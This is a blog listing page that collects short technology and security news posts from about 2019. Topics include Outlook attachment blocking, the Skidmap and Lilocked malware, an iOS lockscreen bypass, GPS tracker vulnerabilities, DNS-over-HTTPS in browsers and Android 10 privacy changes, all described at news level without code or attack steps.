Social Items



Microsoft has been actively working to thwart phishing in Outlook, which is a growing online security concern, that led to many recent compromises involving big companies who are now devoting enormous resources in combating the menace.

The company had earlier introduced some measures to combat the menace, such as DMARC, a standardized specification on email recipient systems authentication. DMARC authenticates any incoming message using SPF and DKIM technologies, in order to check phishing and SPAM mails, but still Malware or computer virus can infect computers in several other ways.

While the most common methods that malware infect a computer is usually through malicious file attachments via emails, which easily execute the malware once a user opens the attachment in the mail.

Microsoft has planned to blacklist additional 38 file extensions in its list of file extensions, which blacklist will ensure that such extensions are blocked from downloading as attachments in the Outlook web-mail service, the email client that allow users to access emails, tasks, calendars and contacts from Microsoft's cloud-based Exchange or on-premises Exchange Server.

The currently blocked file extensions are about 104 entries, and when the scheduled 38 new extensions are added to the block list, will prevent users on Outlook for Web from downloading any such attachments having these 142 file extensions, unless an administrator has specifically white-listed any of the blacklisted by removing it from the BlockedFileTypes list.

The BlockedFileTypes list is essentially blocked file extensions that Microsoft considers to be harmful to its Email users, so as to prevent them from downloading the attachments of such types of files.

Microsoft, however maintains that associated vulnerabilities with its various applications have already been patched, but that the blockade was necessary for the benefit of those organizations that may still be running older versions of the application software.

Therefore, if your organization wishes that employees be able to download attachment of the blacklisted extension types, it should first ensure that its application software are all up-to-date and that users are quite aware of the risks associated with such file types.

Microsoft plans to ban 38 more File Extensions from Outlook Web-mail attachments



Google in collaboration with Jigsaw, have released a large dataset of visual deepfakes, which has been incorporated into the Technical University of Munich and University Federico II of Naples’ new FaceForensics benchmark, aimed at directly complimenting deepfake detection efforts.

Deepfakes have presented huge threats, with the latest AI capabilities, there are huge possibilities that are both exciting and horrifying at the same time. And the technology isn’t just limited to online platforms, just like any transformational technology, this has created some challenges.

While Google had earlier released a dataset of synthetic speech to develop high-performance fake audio detectors, in support of an international challenge. And the dataset has been downloaded by over 150 researchers and industry organizations as part of the challenge, which is also now freely available to the public.

These technologies would have been thought as impossible only a few years ago, now there are generative models capable of synthesizing hyper-realistic images, voice, music, or even video. And these models have been employed in a wide variety of applications, including text-to-speech applications, and generation of training data for medical imaging capabilities.

Google over the years have worked with both paid and consenting actors to provide hundreds of videos, while using publicly available deepfake generation methods, to recreated thousands of deepfakes from the videos.

The final results, comprising videos, both real and fake, will directly support deepfake detection efforts, and serve as part of the FaceForensics benchmark, free to the research community, and for use in developing synthetic video detection methods.

But the threat posed by the deepfake technology isn’t just limited to online platforms, if regulations and policies are not implemented to prevent the harm that technologies like DeepFakes are capable of doing, nothing else can stop it.

Google tackles Deepfakes by the recreation of dataset for Detection Research



Microsoft advisory had disclosed the RCE vulnerability that leverages the way IE’s scripting engine stores data, which could result to memory corruption, allowing attackers to run arbitrary code.

The attackers can also get same system privileges as the user, meaning that if the user is having admin rights, the attacker will equally get all the rights, enabling them to even create new users with admin-level of rights, and stuff like installing/uninstalling of system applications.

Microsoft issued a warning about the severe remotely executable vulnerability (CVE-2019-1367) existing in its oldest browser, Internet Explorer (IE), and had subsequently pushed out an out-of-bound emergency patch to fix the flaw.

The company also stated that the vulnerability is exploitable over the Internet, if a user is tricked into visiting a specially-crafted malicious site.

Surprisingly, there are over 8% of Internet users still stuck to the old browser, IE, and the market share also surpasses that of Apple Safari and the newest browser, Edge. And to make sure these set of users are protected the company had to issue the emergency patch, while advising that users should install the security patches as soon as possible.

This latest bug is coming on the heels of an earlier bizarre IE bug that allowed an attacker to steal files on a users system even when not actually using the browser.

And perhaps, the ultimate solution will have to be absolute ditching of the older browser and hopping onto the latest browser, Edge, which guarantees the best protections for now.

Microsoft pushes out a patch for IE Bug that allow attackers hijack systems



The world's most popular operating system, Android is 11 today, though with a mixture of ups and downs, the operating system has beaten all odds mostly because there wasn’t any strong competitor.

While the rise of Android is phenomenal, and it's amazing how the smartphone platform has evolved over the last decade, been primarily designed for touchscreen mobile gadgets such as smartphones and tablet devices, the growing adoption of mobile devices sure played a huge part.

Albeit, Google turned the formerly no-name operating system into the world's most popular smartphone platform, Android system has long been criticized for its fragmentation, with millions of devices not able to receive regular security fixes and feature updates, despite that patches are made available every month by Google.

A brief history of Android OS



Originally developed by Andrew E. Rubin, an American computer programmer, Android was stated in a bid to develop what he calls “smarter mobile devices that are more aware of its owner’s location and preferences” - which is perhaps the "SMART" attached to such phones today.

Though with the initial two years of Android, it struggled to gain foothold in the mobile phone industry, not until Google acquired the company in 2005 and from near-obscurity to more than 250 million product activation per year as at 2014.

Google biggest turn around decisions was perhaps the use of Linux as the foundation for the Android operating system, which has lend it the power of the highly disparate open source community. The company was prepared to fight off the Apple advances with the iPhone becoming hugely popular, Google joined the Open Handset Alliance, made up of Qualcomm, T-Mobile, HTC, Motorola, and Texas Instruments.

What were the Android breakthrough moments?



Android OS, following Google's joining of the Open Handset Alliance, became the de facto operating system for all smartphone manufacturing companies under that umbrella body, which includes Motorola, HTC, and Samsung. And given that such phones launched with several of Google own services and unique products like Maps, YouTube, and Google Search, gave Android a vantage point against the competitors.

Even though as at then, Google Play Store (formerly Android Marketplace) could not measure up to the Apple App store, but with the full weight of the open source community of developers, Google knew that the gap will sooner than later be closed.

The Android Marketplace, now known as Google Play Store, is where the developers made their mobile apps available for mobile users to download, which is hugely responsible for the success of Android platform.

And then, the Security Puzzle!



Given the many different manufacturers saddled with the task of churning out Android devices, all updates pushed out by Google, from the monthly security fixes to version updates, have been subject to the partner's discretion.

But Google had been trying to make Android better, and have added notable security features from time to time. Starting from Android 1.x, where Google introduced the Android Market and support for third-party apps. Then comes Android 2.x, with the ability to install apps on external memory, and later versions, Google also made some major changes that brought about a whole new level of security for Android.

Now, still millions of some older devices are not receiving the regular security patches and feature updates, even the upcoming Android 10 will undoubtedly not solve the whole security puzzles, as it will take several years for some manufacturers to trickle out the update to their Android devices.

Google still struggling to Solve the Security Puzzle as Android turns 11



Google is currently testing the "Incognito mode" for Google Maps on Android which feature will hide the users data whenever they choose to access the maps without tracking them.

While this could be replicated on desktop by simply using the Incognito Mode in Chrome to open Google Maps, without having your data tied to your Maps experience, but not many people are actually aware of this possibility. Hence Google is opening up Maps app to leverage the benefits of native Incognito Mode within the application.

The feature is coming on the heels of some scandal involving how Google invade user’s privacy through location tracking, and by misleading users that their location data isn't collected because of the disabling of location permissions.

This new capability could be helpful in cases when a user don't want to be tracked on accessing Maps, and since using various apps and services utilize such data, it should be made clear when the data are not been tracked. And since the feature can be turned on, just like Chrome Incognito Mode, makes it easier to prevent your navigation data to be associated with Google account.

The Incognito Mode will also work everywhere that Google Maps is available, like Android Auto - which is Maps utility on cars that helps in navigation, and once the mode is activated in a car, it’ll show black status bar which reads the “Incognito Mode" is on.

For Android phones, simply selecting the option from your Google account icon, which will display a black status bar to inform you that the app is running in incognito mode. Additionally, the locator marker will turn to dark color to mark the change. Though, you’re still able to switch back to regular Maps whenever you choose.

To try out the feature right now, you should upgrade to the Preview Maps version 10.26, which requires that you’re registered on the select Preview Maps test group. And for the rest of us, we’ll just have to wait until Google finally rolls out the feature to all Maps users.

Google to roll out the ability to use Maps anonymously without tracking



Google has made it possible for web searchers to find specific or "key moments" from videos in search results, which feature will come handy for those looking for a particular scene in long videos.

While there are lots of way to discover visual and even audio information on Google, which ranges from finding the useful podcasts that explains the elements in the images, but searching inside a video was not possible before now. With this new capability, Google will make all videos somewhat skimmable like text, meaning it will be easy to overlook video content altogether.

However, video creators will have to provide timestamps in their videos to make them easy for a searcher to run a quick scan of the video content, without necessarily going through the whole of the video.

Steps to highlight Key Moments in Videos on Google Search



If you search for instance, "how-to videos with multiple steps", or perhaps longer videos like a documentary, Google will also provide links to some key moments within the video based on the timestamps provided by the video creators.

So, you’ll be able to easily sift through the content to see find the particular video that has what you’re searching for, and the specific section of the video. And this will especially benefit those people who make use of screen readers, as it will make videos more easily accessible.

What Languages & Video format are supported?



For now, you can only be able to find the key moments for YouTube videos on Google Search in English. And the video creators are required to provide timestamp data in the video description for the feature to work.

Tip: VideoProc is available for Windows and Mac to convert any video to any format.

Google will also introduce a way for other video creators across the web to markup their videos so that they can be more easily searchable on the search engine.

And soon, you’ll will be able to find any key moments from all videos from around the world, including CBS Sports and NDTV, as they've already started implementing the markup code to their videos, with more creators still looking to adopt this helpful feature, and perhaps it will be available in more languages in the near future.

How to Find highlight of Key Moments in Videos on Google Search



While Oracle first introduced Commercial Relation Database for Linux way back in 1998; the company just recently announced a fully automated cloud OS, dubbed Oracle Autonomous Linux.

Oracle Autonomous Linux, along with the Oracle OS Management Service, is perhaps the only autonomous operating environment that completely eliminates complexity and errors to deliver optimum security and availability, and of course cost savings for enterprise customers.

What is an Autonomous Operating System?



Autonomous OS is an automated system employed to make the process of maintaining cloud servers, including patching and scaling, completely autonomous. With the tasks of keeping enterprise systems secure been one of the biggest challenges facing the IT administrators, which tasks are hugely tedious and error prone, and even more difficult to manage in large-scale cloud environments.

As such, autonomous operating system is the supposed answer to this growing security challenges, with Oracle Autonomous Linux OS as the first autonomous OS, meant to simplify cloud computing for enterprises. Now enterprises can rely on the autonomous capabilities of the OS to ensure that systems are secure and highly scalable to help protect against cyber-attacks.

How does Oracle Autonomous Linux works?



In conjunction with the Oracle OS Management Service, Oracle Autonomous Linux uses advanced machine learning and other autonomous capabilities to deliver security and availability, and at the same time, freeing up critical IT resources which eliminates unnecessary downtime to tackle more strategic tasks.

Irrespective of whether the enterprise is running on Linux, Windows or even the latest Autonomous Linux, the new Oracle automated OS can effectively offer both monitoring capabilities and control over the systems.

Thus, the main features of Oracle Autonomous Linux OS are automatic patching and scaling with diagnostic reports to help keep the Linux Kernel and User Library safe through the automated security fixes. It also extends protection for internal and external attacks by blocking known exploits.

Oracle Autonomous Linux come bundled with the Oracle Premier support, an enterprise-class support service, which guarantees prompt responses. But most importantly, it affords enterprises a 30-50% savings in the Total Cost of Ownership.

What is Autonomous Operating System & How does Oracle Autonomous Linux works?



The Linux malware, Skidmap is fully capable of mining cryptocurrency through the creation of malicious LKM (loadable kernel modules) to stay undetected, by overwriting and modifying the kernel capabilities.

While the security researchers at TrendMicro who discovered the new Linux malware claimed that it is capable of illicit cryptocurrency mining activities, which are aimed at enriching the cybercriminals, which activities go undetected by the users. Asides cryptomining, the new malware can also grant backdoor access to the attackers on the affected system using a secret master password.

And once Skidmap infects a system through the commands to schedule jobs in any Unix-like OS, it installs malicious codes (“pc”), which will eventually lower the security settings of the system.

Albeit, there isn't any information on the particular cryptocurrency that is mined by the malware, as it simply injects the system with a cryptocurrency miner, which the malware does by figuring out the OS, and works only on either Debian or RHEL/CentOS systems.

The malware devises other method of unauthorized access to an infected system by replacing the “pam_unix.so file” - which file serves for authentication of the Unix system, with malicious variant, coded as “Backdoor.Linux.PAMDOR.A.” file. And the components include fake “rm” binary, and kaudited binary that install several LKMs, with the Iproute module and Netlink rootkit to fake the network stats.

Given that the cryptocurrency-mining threat could lead to higher disruption of business, and perhaps more expenses for the user, it is recommended that Linux users should keep their systems software up-to-date, and apply patches a soon as they are made available, and be cautious of installing any third-party repository.

Linux Malware, Skidmap capable of Cryptomining via the Kernel module rootkit



Opera GX is a game-centric web browser developed by Opera Software AS, which was first announced on June 11, and now released as the world’s first gaming browser.

The browser is distinguishable by its gaming-inspired theme and the integration of Razer Chroma, which is perhaps the world’s largest lighting system for gaming devices, allowing you to enjoy a more thrilling and immersive experience browsing with the lighting effects on your supported device.

And there’s the presence of CPU and RAM limiter capabilities, aimed at speeding up your PC gaming experience altogether. Albeit, this may not be the first browser to integrate Razer Chroma, as Vivaldi already have it in version 2.5 which brings first-of-its kind integration to Razer Chroma for gaming devices.

Opera GX is currently supported only on Windows PCs, and expressly for use within games, just as Steam’s inbuilt browser works. Though, it isn't supported for game consoles like the Microsoft Xbox One or PlayStation game devices.

How to use Opera GX for gaming



With such features like Razer Chroma integration, and game collections from Twitch, you can use Opera GX, which functions like any standard Chromium browser, but with gamers at heart, and works just as Chrome browser would open a website.

Simply head over the official Opera Gx site to download the gaming browser, and once downloaded to your Windows PC, then launch the browser.



You'd most definitely love the looks and UI experience of the browser, and you'll find most social messengers that are available on the sidebar, which includes Facebook Vkontakte, Messenger, Telegram, and WhatsApp fully integrated, and you are able to chat right from the browser’s interface.

Additionally, Opera GX features a built-in free VPN, which ensures safe browsing on Free Internet from Public WiFi and just like with the main Opera browser and adblocker, with a “video pop out” feature to allow you playback videos in smaller overlay outside of the web browser.

What more features are available on the Gaming Browser?



There is the “GX Corner” panel that sits at the left corner of the tab bar, with news about new upcoming games and deals aggregation links for games on sale. It also includes a “Daily News” section, which by default, offers you a dedicated stream of latest gaming news.

Also, the sidebar features a Twitch panel, whereby you can easily browse through the channels you follow, and to see who's presently online streaming, or even get notified when a channel you’re following starts a live streaming.

Opera will be bringing a “Video over game” feature so that you can also watch a video walkthrough or other video on top of a game section, even while you’re still playing it, though this feature isn’t yet available for now.

How to use Opera GX to Enhance your Online Gaming experience



The iPhone lockscreen bypass bug that was reported by a security researcher, Jose Rodriguez has gone unpatched as Apple is prepping to release the newest version of its mobile OS next week.

While the exploit allow just anyone to bypass the iPhone lockscreen to gain access to contact information, and perhaps other piece of information saved on the device. The bug was first spotted in 2018 on iOS 12.1, and now the latest iOS 13 still suffers the same bug using similar technique, which revolves around the activation of FaceTime call and accessing the Siri voiceover feature to enable access to contact list.

The bypass technique also works on iOS 13 GM which runs on iPhone X, albeit access to photos is denied on the device, but ordinarily, the procedure requires physical access to the iPhone, and the enabling of voiceover by initiating a FaceTime call.

And perhaps, this latest bug is inline with a long list of lockscreen bypass bugs on iOS, which started from iOS 6.1 & 7 far back in 2013, that allowed just anyone access to iPhone contact information and even saved photos. Even on the iOS 8.1 and iOS 12.1, the lockscreen can also be bypassed using same procedure.

But the good news is that Apple is already working on the permanent fix, which is expected in the iOS 13.1 beta, which is planned for release on September 30th.

Apple to release iOS 13 without patching the LockScreen Bypass bug



Google announced plans to implement DNS-over-HTTPS (DoH) in the next version of its browser, Chrome 78 with users given the option of choosing the corresponding DoH server to use for DNS resolution.

This is coming on the heels of Mozilla's enabling of DoH in the main Firefox browser release for a small percentage of its users, and promise of subsequently making it available for all Firefox users. While the actual support for DoH was added to Firefox 62 to improve the way the browser interacts with DNS, using encrypted networking to obtain DNS information from the server that is configured within the browser.

Albeit, Mozilla is been criticized for enabling the feature by default on Firefox and domiciling all the DNS traffic to Cloudflare.

Google, on the other hand, is towing a different part, as it will first check whether a user's DNS provider is on its list of known DoH-compatible providers, which if the user's DNS provider is on the list, will automatically upgrade Chrome DoH to that provider's DoH server for DNS resolution.

And Chrome DoH will run on all platforms other than Linux and iOS, including Android 9 and later, which if the user has configured a DNS-over-TLS provider, Chrome will also use that instead of the ones from their list, except there is an error.

The upgrading of DNS Resolution to DoH will happen according to the user's current DNS provider, that given that it is supported, as Google feels that the users DNS resolution experience will need to remain the same.

Nonetheless, DNS-over-HTTPS (DoH) have not been welcomed in enterprise environments, governments and ISPs, as some ISPs in certain countries block connection to sites via monitoring the DNS traffic.

It will allow users to bypass such censorship or spoofing attacks and increase privacy as the DNS requests would be hard to monitor. And just anyone, including privacy advocates would be able to bypass traffic filters set in place by rogue governments to track the citizens.

Chrome 78 to make debut with DNS over HTTPS (DoH) support



Mozilla announced plans to enable DNS-over-HTTPS (DoH) by default in the Firefox browser, starting with US users this month. But the news was received with lots of criticism, as most security researchers believed the idea of domiciling all the DNS traffic to Cloudflare, is bad idea.

While the operating system is what's normally responsible for managing DNS and other network settings on all applications, but Mozilla is looking to change all that, by making Firefox able to dictate the pitch. And should other applications also follow this example, it will only lead to chaos over the Web.

Now, imagine if you get different DNS for different applications or perhaps, have the applications implementing own IP stack, with different addresses, routing and so forth. Though, DoH generally, is a good technology as it brings privacy via encryption, but the correct way would be to standardise DoH and add support for it into automatic address configurations and operating systems, not applications.

Mozilla should revert the change to allow users, at least to opt-in, and choose their DoH provider, rather than automatically defaulting to Cloudflare. The company must take real responsibility by working together with the security community to create RFCs to make DHCPv6, DHCPv4 and Router support DNS URLs instead of IP addresses.

It could also contribute in developing support for the operating systems, if truly privacy is a concern for Mozilla. And whether you've got trust for Cloudflare or not, directly supporting centralization by using DoH in Firefox sucks.

The best way to voice out against it is perhaps is to turn DoH off in your Firefox browser, simply go to Settings - Network Settings and uncheck the Enable DNS over HTTPs checkbox.

Why Mozilla's defaulting of Firefox DoH to Cloudflare is a bad idea?



Cloud Dataproc is a fully managed cloud service for running Apache Spark and Hadoop clusters in a simpler, and more cost-efficient manner, by reducing operational hours, and you paying only for the resources used.

Now, Google Cloud brings Spark as a service to the Kubernetes container, and ditching the virtual machine-based Hadoop clusters, with other non-Spark analytics engines support coming in the future. While the open source container orchestration platform, Kubernetes has been a big deal in the Cloud industry, which cluster computing has become increasingly important in big data processing.

Google is launching the alpha of Cloud Dataproc to Kubernetes as an important step for the Cloud service to serve as a hybrid cloud model.

The overriding idea, however is for enterprise customers to have the ability to run Apache Spark on Google Kubernetes Engine (GKE) clusters, with products such as Anthos making GKE available virtually anywhere, customers will be able to take Cloud Dataproc to their data centers as well.

Google Cloud Dataproc coming to Kubernetes is significant as it provides customers with single control plane for both deployment and managing of Apache Spark on Google Kubernetes Engine on public cloud or on-premises environment.

This is bringing enterprise-grade support, management, and security to Apache Spark jobs on Kubernetes, which is also the first of many objectives, including to simplify infrastructure complexities for data scientists around the world.

Google Cloud Dataproc comes to Kubernetes with an alpha release



Mozilla has progressed in its effort to thwart network snoopers by encrypting connections to the web servers that host websites, using DNS-over-HTTPS (DoH), the combination of the network technology, DNS and HTTPS, to prevent middlemen from figuring out the internet servers.

While the support for DoH was added to Firefox 62 as a way to improve the way the browser interacts with DNS, employing encrypted networking to obtain DNS information from the server that is configured within Firefox, but it does not use DoH by default, as users are required to go through the configuration editor to enable it.

Now, the company has announced plans to enable support for the DNS-over-HTTPS protocol by default within the Firefox browser, starting with US users this month.

Mozilla had been testing the DoH support in Firefox way back since 2017, and so far, no issues have been recorded with the new protocol. So, it now plans to enable DoH in the main Firefox browser release for a small percentage of its users, and subsequently enable it for all Firefox users.

What this means is that Firefox will ignore the DNS settings setup in the operating system, and instead, use the browser-side DoH resolver. And the encryption of the DNS traffic will effectively hide DNS information from ISPs and traffic filters, or even , enterprise firewalls and any other third-party that wants to intercept a user's traffic.

Albeit, DNS-over-HTTPS has not been welcomed by enterprise environments, governments and ISPs, as DoH could allow just anyone, including privacy advocates to bypass traffic filters set in place by rogue governments to track the citizens.

Mozilla's implementation of DoH, however would help to seal off major holes, regarding privacy and security, though there will be some technical challenges, but gradually things will surely improve.

Mozilla will now enable Firefox DNS-over-HTTPS (DoH) by default



Lilu (Lilocked) ransomware was first discovered by a ransomware note uploaded on ID Ransomware, a portal for identifying new ransomware based on the demand specified in the ransomware note.

Now, the new strain of ransomware has reportedly infected thousands of Linux servers around the world, with the attacks haven commenced in mid-July, but severe cases were most evidence in the last few weeks. While the actual mechanism employed in the attack remains unknown, it is quite obvious that bad actors are targeting Linux-based servers running on the defunct Exim software.

The ransomware note that accompanied the attacks come with the encrypted message: “I’ve encrypted all your sensitive data!!! It’s a strong encryption, so don’t be naive to restore it;)” according to a Russian forum.

And once the victims click on the link within the note, they are redirected to a site on the dark web, demanding that they enter the key from the note, which when entered, requires them to deposit 0.03 bitcoin or the equivalent of $325 in an Electrum wallet in order to recover their files.

But luckily, the ransomware doesn't affect any system file, and Linux systems will continue to run as normal; as it target only files with such extensions as CSS, PHP, HTML, SHTML, JS, INI and other formats. Albeit, the actual number of infected Linux servers could not be ascertained as there are many of such servers currently not indexed on Google.

For now, there is no security advisory issued to mitigate the attack, however as per usual security recommendation, try to ensure your passwords are strong and all apps are updated to latest versions.

Linux Servers targeted by new strain of Lilocked (Lilu) ransomware



The cybersecurity researchers at Avast have disclosed that about 29 models of GPS tracking devices used in keeping tabs on children manufactured by Chinese companies, come with a number of vulnerabilities.

While the GPS tracking devices are estimated to be over 500,000 (available for purchase on Amazon and some other online merchants) all come shipped with "123456" as the default password, which an attacker could easily break into as most of the users never bothered to change the default password.

The vulnerabilities stems from the fact that communication between the 'Cloud and GPS trackers' and 'Cloud and the device's mobile Apps' and 'Users and the device's web application' were done over unencrypted HTTP protocol, leaving it open to man-in-the-middle (MiTM) attackers who could intercept the data with unauthorized commands.

As communications via the web application is over HTTP; the JSON requests are also in plaintext and unencrypted, allowing an tracker to call an arbitrary mobile number, which when connected would enable them to listen to the tracker through the other party without trace.

Again the communication in text-based protocol lacks any form of authorization, which process works by identificartion of the tracker by its IMEI number.

The researchers also discovered that remote attackers could obtain the real-time GPS coordinates of any target device by simply sending SMS to the mobile number associated with the SIM card which is to provide DATA and SMS capabilities to the device.

Albeit, the attackers would need to first know the associated mobile number and password on the tracker to be able to carry out an attack, though it can be exploited by the cloud/mobile app flaws to authorize the tracker to send SMS to an arbitrary mobile number by itself, allowing the attackers to obtain the trackers specific mobile number.

Once access is gained to the device's mobile number and given that the default password '123456' remains for most of the devices, the attacker can easily use the SMS as attack vector.

The researchers, however claimed to have since notified the manufacturerers of the GPS tracking devices critically affected by the security vulnerabilities, as well as the vendors, but still no response.

How GPS Tracking devices could expose Kids real-time Location data



Twitter has temporarily disabled the 'Tweet via SMS' feature after it was reportedly abused by hackers to compromise the company's CEO, Jack Dorsey's Twitter account, whereby a series of tweets with racial slur was posted on the timeline.

The hacking group called "Chuckling Squad" - replicated the mobile number associated with the CEO's Twitter account to gain access to tweet racist, cum offensive messages and threats via SMS. The procedure known as "SIM Swap" allows anyone to recover a supposedly lost or displaced SIM by requesting the telecom company to transfer the number to another SIM card.

Through social engineering trick, the group were able to get Dorsey's mobile phone number and provider, which enabled it gain unrestricted access, whereby they used the popular 'Tweet via SMS' feature to post tweets under his username, without actually breaking into his account.

While the Tweet via SMS feature allow users to make post directly to Twitter by simply sending an SMS message to a specific Twitter number from the registered mobile number associated with the account. Albeit, it requires no extra authorization which was the bane that allowed it to be easily hijacked by the hacking group.

Twitter halted the feature to forestall such incidence from repeating itself, and has promised to reactivate it in markets that depend on SMS for reliable communication soon.

The company also confirmed it was working on longer-term strategy because of the vulnerabilities that must be addressed by the mobile carriers to have a linked phone number for two-factor authentication.

Twitter halts the 'Tweet via SMS' feature after an Impromptu hack



Mozilla has been at the forefront in fight against websites that track users online activities, which tracking is only beneficial to advertisers who target specific users, despite that it invades their privacy.

Now, the company has released Firefox 69 with ability to block third-party tracking cookies by default, which is powered by the new tool called Enhanced Tracking Protection, a step-up from its earlier approach of manually keeping websites and advertisers from tracking users online activity.

While the Enhanced Tracking Protection debuted in Firefox 57 as an option to block website elements (analytics trackers, ads and social share buttons), enabling tracking protection outside of private browsing. It aims to help in mitigating privacy threats and put the users back in control of their online activities without fear of snooping and tracking of their browsing behavior across websites — without knowledge or consent.

Firefox 69 goes even beyond the cookies, as cookies aren't the only tracker that follow users around on the web; it also block Cryptominers, which are capable of accessing the CPU, resulting slow down and fast battery draining, which helps the miners to generate cryptocurrency — certainly not for the user, but for themselves.

Firefox allows you to view those sites that are already blocked via the Blocking Tracking Cookies section, and you can also turn off blocking for specific sites.

The Enhanced Tracking Protection is ultimately aimed at blocking only third-party trackers (ad cookies), as it allow first-party cookies, such as logins, so that you can continue where you last left off, without having to retype passwords.

Mozilla's move to tackle cryptomining, stems from the fact that it uses CPU to generate the cryptocurrency, and fingerprinting that track users across the web. The fingerprinting scripts is capable of harvesting a snapshot of computer’s configuration, which can be used to track a user, without consent.

Firefox users, however can turn on ‘Strict Mode’ to get protection from fingerprinting scripts; albeit Mozilla promises to turn fingerprinting protections on by default in future releases.

Firefox 69 block third-party Cookies & Cryptominers by default



Google has released the latest iteration of its renowned mobile OS, Android 10, breaking from the decade old norm of naming it after sweet delicacies, as the Internet giant is done with fancy dessert names for Android. But, even more significant is the bevy of new security and privacy features coming to the mobile operating system.

While the most important upgrades are concerned with privacy, especially those that prevent apps from profiling you. As Android 10 will generate a randomized MAC address for the device, which unique identifier is used for the network hardware, and will require extra permissions to access the IMEI and serial numbers, which all uniquely identify the device.

Amongst the privacy-focused enhancements, is the control over how apps access a phone’s location - Android 10 brings a new dialog to let users choose if an app can have access to location, with options like at all times or only on running in the foreground.

Google also took steps to protect information around how apps interact with your contacts. As whenever you grant an app access to contacts, Android will not provide any ‘affinity information’ which organizes the data according to your most recent interacts. And this privacy features are not only for individual users, but organizations also gets more flexibility and privacy capabilities, such as when using corporate-owned devices, employees will experience even more privacy using their work device.

And Organizations can provision company-owned devices into work profile mode with zero-touch enrollment or other methods, so that employees can enjoy better privacy for personal reasons and IT admins can have more ways of managing company-owned and BYOD devices.

It will also offer new privacy section within the settings, to enable employees view all the controls in one place, coupled with more granular controls for location data that allow an app access to location only when the app is in use.

Android 10 will bring over 50 security and privacy improvements that's specifically targeted at organizations and employees, with enterprise ability to block installation of apps via unknown sources on devices with a work profile, to reduce organization-wide risk of malware.

The IT admins can also set a private DNS on a managed device, including the requirement of DNS over TLS to avoid the leaking of URL queries.

Google perhaps has been listening to feedback from its users who complained about phone sensors ability to implicitly reveal users details. More reason Android 10 will introduce new version to its ACTIVITY_RECOGNITON permission for apps that track physical activities, such as step count.

Additionally, Android 10 will require specific location permissions for apps requesting to access selected Wi-Fi, telephony, or Bluetooth functions. While another a new feature called scoped storage, will restrict app’s access to files on external storage, giving access to only its specific directory and media types.

How Google's latest software, Android 10 takes privacy a notch higher



Hangouts, which originally launched with Google+ social network, is a messaging system that allows for collaboration between workers, with offerings like video chats and voice call, in addition to regular text messaging.

While Google+ has been discontinued, the company had scheduled the transition from classic Hangouts app to Meet (a more secure, and improved video chat for meeting experience providing better performance over the classic Hangouts app) for G Suite customers starting from last May 2018 to October 2019 deadline.

Launched in March 2017, Meet is an improvement on the video meeting experience providing better performance over the classic Hangouts video calls, with better security and reliable method for guests to join meetings.

Google had earlier planned to retire classic Hangouts with the purported full migration of G Suite users to the new platform, but now, it has extended the migration deadline for G Suite customers to make the switch to Hangouts Chat and Meet tools.

And the new final transition date, according to google will be “no sooner” than June 2020; though not a more precise time frame, the company promised to make a clear announcement when the date is closer to the deadline. While G Suite customers that need to upgrade to the latest versions of Hangouts can still do so, by requesting an invitation via the Accelerated Transition Program.

Google promises to continue to improve the transition of classic Hangouts group conversations, as well as additional new Chat features, like the "Read receipts" - which notifies a user when messages have been read.

However, the migration by organizational unit isn't yet available, instead the classic Hangouts group conversations can be recreated in Chat, albeit it requires a review of the Deployment Guide and Known Limitations, to determine whether the migration experience will be right for your organization.

Google pledges to provide an advance notice once there is more definitive date, and advises customers to keep a watch on the G Suite Updates blog for new information.

Google Hangouts migration deadline extended for G Suite customers



Google is grappling with the outbreak of data-abusive apps on its platforms, with instances like the Cambridge Analytica scandal, which affected the Facebook app, whereby users data were sold purposely, albeit illegitimately without the users consent.

The company in a bid to contain the situation has announced the expansion of it's vulnerability reward program, which includes: the Developer Data Protection Reward Program (DDPRP), and the Verifiably & Unambiguous Evidence of data abuse in Android apps and Chrome extensions; also now extended to the OAuth projects.

It has also expanded the scope of the Google Play Security Rewards Program (GPSRP) to include all apps on Google Play Store with over 100 million installs, and offering help to affected developers in fixing such vulnerabilities through responsive disclosures.

Getting Bounty by Finding Data-Abusive Chrome & Android Apps



Whenever a developer reports a data abuse related to any Android app or Chrome extension, which app or extension will be liable for removal from the Play Store or Chrome Web Store; though no reward table is listed at the moment, but depending on the severity of impact, it could net as much as $50,000 for a bounty reward.

The reward is aimed for just anyone who is able to provide a verifiable and unambiguous evidence of data abuse, which measures will help Google to thwart malicious apps and Chrome extensions that abuse users' data on its platforms, and also beef up security on the Play Store.

The program will open door for researchers to help in identifying and fixing vulnerabilities in apps, and if any developer succeeds in pinpointing an abuse on its own apps, will also receive rewards directly from Google. That will encourage more app developers to start checking their own apps, and to disclose possible vulnerability or bug; which validates the bounty program's working directly with the developer community.

How to Get Bounty by finding Any Data-Abusive Chrome or Android App

Subscribe to: Posts (Atom)